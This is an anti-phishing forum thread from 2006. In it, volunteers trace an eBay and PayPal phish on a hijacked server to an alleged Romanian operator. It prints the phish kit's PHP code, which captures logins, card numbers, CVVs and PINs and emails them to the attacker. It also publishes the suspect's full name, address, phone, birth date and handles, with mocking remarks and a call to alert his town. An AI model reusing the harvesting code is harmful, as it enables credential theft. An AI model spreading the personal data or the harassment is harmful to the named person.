MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| Ebay Phisher, Meet and Greet !!
On August 28 nwrickert  submitted an Ebay phish 3782 to phishtrack
3782 Ebay Phish Mail
»/phishtrack?pi···2&urls=1 This Ebay phish was operating from a hijacked Win 2003 server at IP 217.218.131.201 in Tehran, Iran.
During the process of removing the phish site some evidence was uncovered that led to the culprit. The Hijacking and set up of the phish took place from IP 89.136.119.91 registered to Astral Telecom in Romania. Coincidentally, that is the same IP that the phish Ebay spam originated from, see headers phishtrack submit: »/phishtrack?pi···&parts=1
quote:
Return-Path: xx(email)xxReceived: from 192.168.1.4 ([89.136.119.91])by mp.cs.niu.edu (8.13.8/8.13.8) with SMTP id k7S9SlZB027596for xx(email)xx Mon, 28 Aug 2006 04:28:53 -0500 (CDT)Received: from 222.0.83.4 by ; Mon, 28 Aug 2006 07:23:38 -0300Message-ID: xx(email)xxFrom: "eBay" xx(email)xxReply-To: "eBay" xx(email)xxTo: xx(email)xxCc: xx(email)xx xx(email)xx xx(email)xx
Say "Hi" to the Romanian Ebay phisher Mr. Borcila Andra, known to his friends as "Andra"
Romo criminal Borcila Andra
Here Borcila is taking a time out from the national occupation of scanning networks, hijacking computers, and hosting phishing sites to steal your financial data.
Romo criminal "Andra"
And a jovial Borcilla accepting the village crown wreath for winning the weekly most identities stolen contest.
More on "Andra" in a moment, first let's have a look at his behind the phish scenes handy work. Borcila had a script on the Ebay phish that captured the victim's User Id and Password and emailed to romanianpsycho@gmail.com:
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$userid = $_POST['userid'];
$pass = $_POST['pass'];
} else {
$userid = $_GET['userid'];
$pass = $_GET['pass'];
}
$myemail = "romanianpsycho@gmail.com";
$subject = "eBay";
$ipa = getenv('REMOTE_ADDR');
$dta = date("j.m.Y, G:ia", strtotime("+3 hours"));
$message = "
User: $userid
Parola: $pass
-------------------------------
";
if($UserIDgol != $userid || $passgol != $pass) {
$fp=fopen("REDACTED", "a+");
fputs ($fp,$message."\n");
fclose($fp);
header("Location:https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&pUserId=&co_partnerId=2&siteid=0&pageType=222&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BMember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dcaptainsimos%26redirect%3D0%26de%3Doff&pp=&errmsg=8
Besides the Ebay phish Mr Andra was working on a Paypal phish on the same Iranian server, his work in process included:
$file = fopen("REDACTED", "a");
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");
fputs ($file, "$adddate\r\n");
fputs ($file, "Login: $login\r\n");
fputs ($file, "Password: $password\r\n");
fputs ($file, "CC Number: $lol\r\n");
fputs ($file, "MONTH: $adi1\r\n");
fputs ($file, "YEAR: $adi2\r\n");
fputs ($file, "CVV2: $adi3\r\n");
fputs ($file, "PIN: $patru\r\n");
fputs ($file, "$ip\r\n");
fputs ($file, "-----------------------------------\r\n");
fclose ($file);
$ip = getenv("REMOTE_ADDR");
Borcila also had a failed attempt at sending 100,000 Ebay phish spams from that same location:
quote:
ebay phish
emails sent
Total sent : 2828
Total NOT sent : 98833
Bad addresses : 2066
Connection errors: 5425
Mailing aborted at: 8/18/2006, 4:21:22 AM
Mr. Andra is already a career criminal and is not shy about listing his occupation as "Crime" and his interests as "Fraud":
Borcila's Resume
Besides the romanianpsycho@gmail.com address Borcila can also be reached at romanianpsycho@hotmail.com, or by AIM: Pantherkut, ICQ 194035514, or by Yahoo messenger: redbloodedeye.
Borcila lists his address as: Toparceanu nr. 6, Braila, Romania, and a telephone number of +40 (239) 620467. Andra's DOB is 01/23/1986.
Borcila "About Me"
MGD
Acknowledgement: scott1527 and amysheehan contributed research to this story. |
|
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| Since this story has came to light,"Andra" has been busy over the past 24 hours !!
It now appears that after this posting the Romanian criminal Mr. Borcila Andra may be a little shy about his full time occupation of criminal phishing and credit card and identity fraud.
Apparently Andra has discontinued two email accounts in the past 24 hours namely: romanianpsycho@gmail.com and romanianpsycho@hotmail.com.
In addition, though Borcila Andra has now bravely changed his ICQ Nickname from "Andra" to " Come and get me": »www.icq.com/people/full_details_···94035514 his actions do not match his rhetoric. While making the nickname change he has also altered his profile and tried to hide his real identity.
Note the "Before" and "After":
Andra hs been systematically engaged in scanning net blocs and hijacking computers to use for multiple Ebay, Paypal, etc phishing sites. He engages in criminal fraud by using the collected credit cards and user ID's and Passwords.
Andra's self proclaimed occupation and interests listed here: »www.thefreewebhosting.com/profil···71132bac have been confirmed as accurate.
The challenge of "come and get me" should be turned over and reported to "contact[]efrauda.ro" »www.efrauda.ro/efrauda/admin/def···0&lang=2 and »https://www.efrauda.ro/efrauda_secure/ad···1&lang=2
That being said, I will agree however, that Mr. Borcila Andra is not in any danger of winning the "Smartest Criminal of the year" award !.
MGD |
|
scott1527
Premium
join:2003-01-19 | reply to MGD
that sounds like a challenge mgd.
worp factor 2 engaged. starship enterprise has moved up a gear.. |
|
pcdebb
RIP dadkins
Premium
join:2000-12-03
Tampa, FL
clubs:  | reply to MGD
brilliant!!  |
|
UncleScooter
I once was SatManWorkin
Premium
join:2002-04-15
Tallahassee, FL | reply to MGD
Well MGD looks like you scared the nads off him too, he went and got himself a sex change to boot!!!!!! |
|
nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL | reply to MGD
Wow! Nice work.
The rate of new incoming phish email has been very low for the last couple of days. Maybe you disrupted something. |
|
user4275
Location, Location, Location
Premium
join:2003-11-27
Chicago, IL
clubs:
 ·AT&T U-Verse
| said by nwrickert :The rate of new incoming phish email has been very low for the last couple of days. Maybe you disrupted something. Well yes, Mr. Andra was busy moving from Romania to the US, as his new residency info suggests.  |
|
scott1527
Premium
join:2003-01-19 | reply to MGD
he maybe did the scams to get a sex change? |
|
Doctor Olds
I Need A Remedy For What's Ailing Me.
Premium,VIP
join:2001-04-19
1970 442 W30
clubs:
| reply to MGD
said by MGD :Since this story has came to light,"Andra" has been busy over the past 24 hours !! It now appears that after this posting the Romanian criminal Mr. Borcila Andra may be a little shy about his full time occupation of criminal phishing and credit card and identity fraud. I will agree however, that Mr. Borcila Andra is not in any danger of winning the "Smartest Criminal of the year" award !. That's too damn funny. Excellent!! Scared the male out of him and she lost her jewels.....
Keep up the Great Work!!!
--
What’s the point of owning a supercar if you can’t scare yourself stupid from time to time? |
|
simpfan742
People Call Me Andrew.
Premium
join:2003-05-18
Belmar, NJ | reply to MGD
Beautiful work! I really enjoyed reading this. Funny, too.
--
My Gallery |
|
garys_2k
join:2004-05-07
Farmington, MI | reply to MGD
Awesome work! Let's hope he spends some time in prison. |
|
MGD
Premium,MVM
join:2002-07-31
Fort Lauderdale, FL
| reply to MGD
A few more snippets of logs from Mr "come and get me" Alba's hacking work on the phish hosting machine in Iran. It appears that he first made a home there over two weeks ago.:
89.136.119.91 - - [16/Aug/2006:23:03:02 +0330] "GET / HTTP/1.1" 406 2690
89.136.119.91 - - [16/Aug/2006:23:03:12 +0330] "GET /index.html.cz HTTP/1.1" 200 1634
89.136.119.91 - - [16/Aug/2006:23:03:13 +0330] "GET /apache_pb.gif HTTP/1.1" 200 2326
89.136.119.91 - - [16/Aug/2006:23:03:15 +0330] "GET / HTTP/1.1" 406 2690
89.136.119.91 - - [16/Aug/2006:23:15:25 +0330] "GET /index.php HTTP/1.1" 200 22
89.136.119.91 - - [16/Aug/2006:23:42:09 +0330] "GET /index.php HTTP/1.1" 200 22
89.136.119.91 - - [16/Aug/2006:23:45:56 +0330] "GET / HTTP/1.1" 200 16
89.136.119.91 - - [16/Aug/2006:23:46:01 +0330] "GET / HTTP/1.1" 200 16
89.136.119.91 - - [16/Aug/2006:23:54:40 +0330] "GET / HTTP/1.1" 200 536
89.136.119.91 - - [16/Aug/2006:23:54:43 +0330] "GET /sysdll.php HTTP/1.1" 200 7539
89.136.119.91 - - [16/Aug/2006:23:54:44 +0330] "GET /sline.gif HTTP/1.1" 404 281
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /pdown.gif HTTP/1.1" 404 281
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /login.php HTTP/1.1" 200 13382
89.136.119.91 - - [16/Aug/2006:23:54:45 +0330] "GET /go1.gif HTTP/1.1" 404 279
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /hide.htm HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /addr.gif HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /ress.gif HTTP/1.1" 404 280
89.136.119.91 - - [16/Aug/2006:23:54:46 +0330] "GET /ie2.gif HTTP/1.1" 404 279
89.136.119.91 - - [16/Aug/2006:23:54:47 +0330] "GET /logoEbay_150x40.gif HTTP/1.1" 200 954
89.136.119.91 - - [16/Aug/2006:23:54:47 +0330] "GET /or_60x23.gif HTTP/1.1" 200 261
89.136.119.91 - - [16/Aug/2006:23:54:48 +0330] "GET /logoVeriSign_100x65.gif HTTP/1.1" 200 1835
89.136.119.91 - - [16/Aug/2006:23:54:49 +0330] "GET /pdownclick.gif HTTP/1.1" 404 286
89.136.119.91 - - [16/Aug/2006:23:54:55 +0330] "POST /contact.php HTTP/1.1" 302 14753
89.136.119.91 - - [16/Aug/2006:23:56:47 +0330] "GET / HTTP/1.1" 304 -
Aslo a sample from the error logs:
[Wed Aug 16 23:00:15 2006] [crit] (2)No such file or directory: make_sock: could not bind to port 80
[Wed Aug 16 23:03:02 2006] [error] [client 89.136.119.91] no acceptable variant: d:/mssql/binn/lol/apache/htdocs/index.html
[Wed Aug 16 23:03:15 2006] [error] [client 89.136.119.91] no acceptable variant: d:/mssql/binn/lol/apache/htdocs/index.html
[Wed Aug 16 23:54:44 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/sline.gif
[Wed Aug 16 23:54:45 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdown.gif
[Wed Aug 16 23:54:45 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/go1.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/hide.htm
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/addr.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/ress.gif
[Wed Aug 16 23:54:46 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/ie2.gif
[Wed Aug 16 23:54:49 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdownclick.gif
[Wed Aug 16 23:56:52 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/hide.htm
[Wed Aug 16 23:56:53 2006] [error] [client 89.136.119.91] File does not exist: d:/mssql/binn/lol/apache/htdocs/pdownclick.gif
Of course no criminal fraudster even one at Mr "come and get me" Alba's two digit IQ level, would not test their phish to make sure that the victim's user id, password and card data was being collected:
quote:
-----------------------------------
Thu Aug 31, 2006 4:30 pm
Login: uasuags@yahoo.com
Password: peleu
CC Number: 4111111111111111
MONTH: 03
YEAR: 2009
CVV2: 123
PIN: 1234
89.136.119.91
-----------------------------------
Fri Sep 01, 2006 10:14 am
Login: ddfdf@ajdfhdhksj.com
Password: asdfsdfsd
CC Number: 4111111111111111
MONTH: 01
YEAR: 2006
CVV2: 123
PIN: 0650
89.136.119.91
-----------------------------------
Sat Sep 02, 2006 3:56 pm
Login: asugasguag@Yahoo.co
Password: mnihiashaihs
CC Number: 4111111111111111
MONTH: 02
YEAR: 2008
CVV2: 111
PIN: 0000
172.158.63.45
-----------------------------------
Sat Sep 02, 2006 10:30 pm
Login: test@test.com
Password: test
CC Number: 4111111111111111
MONTH: 01
YEAR: 2006
CVV2: 000
PIN: 4321
89.136.119.91
-----------------------------------
Except for the one test from an AOL IP, "Alba" performed the complete operation from IP 89.136.119.91. He hacked into the server, set up both an Ebay and PayPal phish, made several attempts to complete a 100,000 phish spam mailing all from the comfort of his Romanian IP.
He posts his criminal resume online, posts pictures of himself, posts his Date of Birth, full address, telephone number, his email address, AIM, Yahoo IM, and ICQ info. When "outed", with the jaevos of a bull and the brain of a flea he says "Come and get me". However, after taking stock of his current situation he promptly changes his gender and begins his disguise.
Having any second thoughts there... Mr Miss "come and get me" Borcila Alba ???
MGD |
|
Doctor Olds
I Need A Remedy For What's Ailing Me.
Premium,VIP
join:2001-04-19
1970 442 W30
clubs:
| It's a shame there is not an International Computer Crimes Agency with Worldwide jurisdiction. She would wet her panties if the Police picked her up at her apartment and took her in shackles to be extradited that same hour to the US for trial, conviction, sentencing and immediate Prison time. Then in 10 or 20 years, send her back to Romania on a slow China boat.
--
What’s the point of owning a supercar if you can’t scare yourself stupid from time to time? |
|
kamm
join:2001-02-14
Brooklyn, NY
 ·T-Mobile US
| said by Doctor Olds :It's a shame there is not an International Computer Crimes Agency with Worldwide jurisdiction. I agree although it would be just as impossible to have the US to be a signee as on the The Hague - we would claim with our usual pathetic hypocrisy that 'everybody is subject except Americans, sorry.' |
|
MxxCon
join:1999-11-19
Brooklyn, NY
clubs:
| reply to MGD
let's give more fame/shame to this scammer?
»digg.com/security/Meet_a_Romania···_Scammer
--
[Sig removed by Administrator: Signature can not exceed 20GB] |
|
kamm
join:2001-02-14
Brooklyn, NY
·T-Mobile US
| reply to MGD
This guys is obviously a career criminal - no job, no interest of having a job and it's most likely also a satisfying "work" for him.
I've immigrated from Mid-EU, I have seen guys like this all over the place around early 90s, even I was offered huge money by gangs to help them in computer crimes (I'm engineer too) which I always immediately refused. (As, of course, online shopping haven't existed yet back then, offers usually meant something bigger - and more crazier - 'gig'...)
Now that region - now part of EU - is well ahead of Romania, so no wonder this kind of "profession" moved into 'more secure' areas (= less police influence expected) eastward, mostly to the Balkan and Romania, Ukraine etc. |
|
wcweaver
Premium
join:2002-02-22
Fort Myers, FL
clubs:
 ·Future Nine Corpor..
 ·Comcast
 ·Embarq
| reply to MGD
I passed this information to the head of thr Romanian National Police at the Southeast European Cooperative Initative, SECI Center in Bucharest, Romania. I don't know if they will do anything but who knows. Hopefully they will turn up the heat on Mr Andra.
SECI website »www.secicenter.org/ |
|
E_V
Premium
join:2000-09-29
Vancouver, BC
clubs:
|  said by wcweaver :I passed this information to the head of thr Romanian National Police at the Southeast European Cooperative Initative, SECI Center in Bucharest, Romania. Obviously everyone's goal is to wipe out scammers, and if that happens, awesome. By turning up the heat and letting them know eyes are everywhere, watching keystrokes, tracking them relentlessly I am content knowing that in the interim where they thought they had a free ride they are now (if they have any brains at all) beginning to perspire.
After all....
August 21 2006 Romanian police arrested 23 people in the southern city of Pitesti as part of a clampdown on internet scam rings operating in the eastern European country. The arrested individuals are among a group of 63 suspects wanted for questioning over allegations they ripped off in excess of $120,000 from 120 foreign marks. FBI and US officials assisted in the investigation that culminated in the recent arrests, local police said on Saturday. If convicted, the suspects face up to 15 years imprisonment for ID theft offences. » www.theregister.co.uk/2006/08/21···ampdown/October 28 2005 London - Three Romanian fraudsters have been jailed on Friday in London for their part in a worldwide fraud scam carried out via Internet auction house eBay, which netted at least £300 000 (about R35,7-million). » www.int.iol.co.za/index.php?set_···0793B265May 18 2006 A group of financial fraudsters stealing money from US citizens’ accounts has been arrested in Moscow. The criminals were stealing money through ATMs. Spokespeople for US police addressed to the Moscow Interior Affairs Department for Struggle Against Economic Crimes several months ago. US officials said that someone was regularly stealing money from credit cards belonging to US citizens. The money, the officials said, was cashed from Moscow ATMs. They added that the credit card holders had never visited Russia before. » english.pravda.ru/hotspots/crime···t_card-0 |
|
peter_m
Premium
join:2005-07-13
Canada, QC | reply to kamm
That doesn't stop everyone else from signing up and making it harder for these criminals. What are all the other nations doing about it? |
|
gatzdon
join:2002-10-25
Lake Zurich, IL
| reply to MGD
Notify the right people
Anyone feel like constructing a brief summary with appropriate links and sending it to all the right people in the scammer's town, like the churches, store owners, government officials, local police, local groups and organizations, etc... We may get lucky and people who personally know the scammer will find out. People that the scammer wouldn't want to know like family.
--
$100 placed at 7 percent interest compounded quarterlyfor 200 years will increase to more than $100,000,000 --by which time it will be worth nothing.- Lazarus Long |
|
